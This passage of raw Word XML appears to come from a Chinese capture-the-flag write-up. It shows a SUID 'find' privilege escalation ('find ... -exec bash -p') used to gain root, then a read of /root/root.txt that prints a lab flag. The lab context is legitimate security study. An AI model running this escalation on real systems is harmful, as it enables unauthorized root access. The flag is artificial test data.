        <w:t>发现其中 find 命令具备 SUID 权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A38B453" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>find /etc/passwd -exec bash -p \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6AB003" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可获得 root 权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EF5775" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="21220CD0" wp14:editId="3252526B">
            <wp:extent cx="5270500" cy="948055"/>
            <wp:effectExtent l="0" t="0" r="635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FADA6D" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="459A66E8" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="4F6AADEB" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cat /root/root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9EEFD4" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>flag{7cb1817c8b8534d69e6518f98164113d}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E638197" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="5A6F5512" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="1B3097F5" wp14:editId="3242579D">
            <wp:extent cx="3019425" cy="3143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1F7DDC" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00A51ECD"/>
    <w:p w14:paraId="5F2C5775" w14:textId="77777777" w:rsidR="00A51ECD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag{7cb1817c8b8534d69e6518f98164113d}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A5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762FF5"/>
    <w:rsid w:val="000822D9"/>
    <w:rsid w:val="00661FDA"/>
    <w:rsid w:val="00A51ECD"/>
    <w:rsid w:val="00C43287"/>
    <w:rsid w:val="05967EAB"/>
    <w:rsid w:val="06DB2A36"/>
    <w:rsid w:val="076B1F92"/>
    <w:rsid w:val="07732E78"/>
    <w:rsid w:val="09072704"/>
    <w:rsid w:val="0ACA05A2"/>
    <w:rsid w:val="0E1A2D8F"/>
    <w:rsid w:val="0FF64476"/>
    <w:rsid w:val="138A080E"/>
    <w:rsid w:val="19D20287"/>
    <w:rsid w:val="218B3D08"/>
    <w:rsid w:val="220F189C"/>
    <w:rsid w:val="2A0D743A"/>
    <w:rsid w:val="2D825376"/>
    <w:rsid w:val="2E3743C1"/>
    <w:rsid w:val="30173AD2"/>
    <w:rsid w:val="40E932B5"/>
    <w:rsid w:val="4A960852"/>
    <w:rsid w:val="627E7027"/>
    <w:rsid w:val="67762FF5"/>
    <w:rsid w:val="6FE26233"/>
    <w:rsid w:val="7C24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58013"/>
  <w15:docId w15:val="{AE394D4D-E3D6-4A4E-862B-77A926FB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仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cstheme="minorBidi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a3">
    <w:name w:val="代码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8D8D8" w:themeFill="background1" w:themeFillShade="D8"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷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2024-04-11T06:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-14T11:38:00Z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